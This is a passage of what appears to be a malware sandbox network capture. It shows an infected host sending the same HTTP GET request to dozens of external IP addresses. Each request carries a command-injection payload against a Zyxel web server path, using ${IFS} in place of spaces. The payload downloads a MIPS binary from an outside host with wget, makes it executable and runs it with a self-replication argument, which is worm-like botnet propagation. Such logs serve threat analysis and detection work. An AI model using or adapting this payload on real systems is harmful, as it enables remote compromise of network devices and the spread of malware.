                                                  Jan 19, 2024 18:24:02.190246105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5953192.168.2.133441295.101.200.154443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.190293074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5954192.168.2.1352406103.55.147.121443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.190331936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5955192.168.2.1352646206.104.186.18443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.190382957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5956192.168.2.1337192168.244.207.79443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.190417051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5957192.168.2.1334826106.63.156.129443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.190459013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5958192.168.2.134763465.233.234.196443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.190495968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5959192.168.2.135644260.200.12.158443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.190546036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5960192.168.2.1354900146.152.38.176443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.190570116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5961192.168.2.133946613.104.149.153443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.190614939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5962192.168.2.1348810129.37.21.140443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.190644979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5963192.168.2.13349305.123.182.37443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.190694094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5964192.168.2.1339930187.116.19.148443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.190747023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5965192.168.2.1344282170.217.69.116443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.190815926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5966192.168.2.135192247.176.120.247443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.190876961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5967192.168.2.134393897.20.137.21443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.190910101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5968192.168.2.1357436162.17.10.42443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.190951109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5969192.168.2.133879037.168.158.112443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.191006899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5970192.168.2.135550035.251.11.63443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.191036940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5971192.168.2.1346520174.180.114.70443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.191086054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5972192.168.2.135435883.103.43.100443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.191107988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5973192.168.2.134016265.229.202.208443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.191180944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5974192.168.2.1337822175.110.210.18443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.191210985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5975192.168.2.1360676196.144.62.208443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.191256046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5976192.168.2.1334802204.132.26.69443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.191293955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5977192.168.2.133360483.157.18.125443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.191333055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5978192.168.2.1343008101.139.49.202443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.191381931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5979192.168.2.1336368136.1.140.199443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.191420078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5980192.168.2.1336632116.190.186.68443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.191469908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5981192.168.2.1354700206.84.204.214443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.191515923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5982192.168.2.1339060191.53.92.254443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.191550970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5983192.168.2.134571832.145.115.80443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.191586018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5984192.168.2.135909650.14.22.144443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.191623926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5985192.168.2.135579848.4.198.175443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.191658020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5986192.168.2.133875860.20.185.143443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.191714048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5987192.168.2.1355566162.78.136.103443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.191726923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5988192.168.2.1356404112.128.95.39443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.191788912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5989192.168.2.1333802142.220.187.9443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.191824913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5990192.168.2.1342874103.140.47.24443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.191869974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5991192.168.2.135807496.253.18.170443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.191905022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5992192.168.2.133325669.233.15.231443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.191961050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5993192.168.2.1357634197.58.236.212443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.192007065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5994192.168.2.1357978150.160.181.38443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.192038059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5995192.168.2.1334110205.159.19.3443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.192089081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5996192.168.2.135935227.58.17.189443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.192128897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5997192.168.2.1355476120.39.77.21443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.192168951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5998192.168.2.1341648101.134.85.219443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.192187071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5999192.168.2.1342640185.244.180.236443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.192251921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6000192.168.2.1341660115.102.194.70443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.192281961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6001192.168.2.1339004108.136.178.138443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.192328930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6002192.168.2.1342964126.33.89.96443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.192356110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6003192.168.2.134944685.34.122.62443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.192392111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6004192.168.2.1336792223.57.253.164443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.192440987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6005192.168.2.1352924155.6.241.180443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.192492962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6006192.168.2.1341594164.0.97.123443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.192536116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6007192.168.2.1360594151.91.24.42443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.192575932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6008192.168.2.135645450.146.84.21443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.192620993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6009192.168.2.135452276.144.133.117443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.192658901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6010192.168.2.134112280.61.253.98443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.192686081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6011192.168.2.135456850.248.168.72443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.192718983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6012192.168.2.1352682167.27.229.83443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.192774057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6013192.168.2.1342934151.174.135.232443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.192815065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6014192.168.2.1338940170.109.46.153443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.192853928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6015192.168.2.133954069.208.67.121443
                                                  TimestampBytes transferredDirectionData
